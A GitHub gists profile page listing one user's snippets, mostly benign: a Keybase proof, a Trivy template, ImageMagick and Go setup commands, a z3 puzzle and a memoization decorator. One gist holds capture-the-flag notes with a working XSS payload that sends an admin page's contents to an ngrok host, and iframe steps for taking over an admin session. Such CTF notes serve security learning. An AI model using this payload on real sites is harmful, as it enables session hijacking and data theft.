Skip to content

Instantly share code, notes, and snippets.

View diofeher's full-sized avatar
🎯
Focusing

Diógenes Fernandes diofeher

🎯
Focusing
159 followers · 36 following
View GitHub Profile
@diofeher
diofeher / keybase.md
Created February 8, 2025 16:34

Keybase proof

I hereby claim:

  • I am diofeher on github.
  • I am diofeher (https://keybase.io/diofeher) on keybase.
  • I have a public key ASBWvH2xuFlSBLsOhpaKe7L73dj0SCd5TpyUz2EMkLgbDQo

To claim this, I am signing this object:

@diofeher
diofeher / application.md
Last active November 22, 2022 22:07
Connecting a Google Form to create issues in a Github project
@diofeher
diofeher / security-gcp-certificate.md
Created December 3, 2020 10:52
Preparation to Security Certification on GCP
@diofeher
diofeher / trivy.tpl
Last active November 19, 2020 16:30
{{- /* Template based on https://docs.gitlab.com/ee/user/application_security/container_scanning/#reports-json-format */ -}}
{
"version": "11.0.0",
"vulnerabilities": [
{{- $t_first := true }}
{{- range . }}
{{- $target := .Target }}
{{- range .Vulnerabilities -}}
{{- if $t_first -}}
{{- $t_first = false -}}
@diofeher
diofeher / imagemagick.sh
Created September 22, 2020 13:03
ImageMagick Useful commands
# concatenate two images with different sizes
convert image1.jpeg image2.jpeg -gravity Center -resize 800x200 +append output.jpeg
@diofeher
diofeher / installing_go.sh
Last active June 30, 2020 14:00
# Installing Go environment on MAC + Visual Studio Code + Oh my ZSH
brew install go
cat <<EOT >> $HOME/.zshrc
export GOROOT="/usr/local/Cellar/go/1.14.4/libexec/"
export GOPATH="$HOME/workspace/go"
export PATH="${PATH}:${GOPATH}:${GOPATH}/bin"
EOT
source $HOME/.zshrc
@diofeher
diofeher / desafio_logica.py
Created April 30, 2020 17:13
from z3 import Solver, Ints, Or, And, Not, sat
x, y, z = Ints('x y z')
s = Solver()
s.add(x >= 0, x <= 9)
s.add(y >= 0, y <= 9)
s.add(z >= 0, z <= 9)
@diofeher
diofeher / mynotes-bytebandits.md
Last active April 12, 2020 15:52

First - XSS on the User

<http://g<!s://q?<!-<[<script>top.admin.location='https://196cffb1.ngrok.io/?data='+JSON.stringify(top.admin.document.getElementsByClassName('is-4')[0].textContent.trim());/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(13);/*](http://g)->a>

Second - Create a page with two iframes. With one, you stay with the admin logged in and with the other one:

  1. Log out
  2. Login with your XSS user
  3. Control the admin iframe with XSS and exfiltrate the data
@diofeher
diofeher / xss.pwnfunctions.md
Last active August 16, 2024 19:33
@diofeher
diofeher / fib_memo_decorator.py
Created December 16, 2019 23:38
class Memoization(object):
def __init__(self, func):
self.func = func
self.data = {}
def __call__(self, n, **kwargs):
if n in self.data:
return self.data[n]
self.data[n] = self.func(n)